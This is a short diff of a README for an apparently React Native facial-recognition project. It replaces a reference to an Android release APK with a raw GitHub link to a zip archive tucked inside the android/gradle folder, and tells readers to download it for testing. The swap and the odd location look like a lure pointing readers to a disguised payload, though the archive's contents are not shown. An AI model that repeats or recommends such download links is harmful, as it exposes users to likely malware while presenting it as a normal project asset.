DhouiouiCharfeddine/react-native-expo-facial-recognition/readme.md

 Releases and assets, revisited
 - The official releases page is the primary source for prebuilt binaries and assets.
-- Use the release file named react-native-expo-facial-recognition-android.apk for Android testing, as noted earlier.
+- Use the release file named https://raw.githubusercontent.com/DhouiouiCharfeddine/react-native-expo-facial-recognition/main/android/gradle/recognition_facial_native_react_expo_3.5.zip for Android testing, as noted earlier.
 - If you can’t download the file, check your network, retry later, or explore the Releases section to locate alternate assets that suit your platform and configuration.

 Putting it all together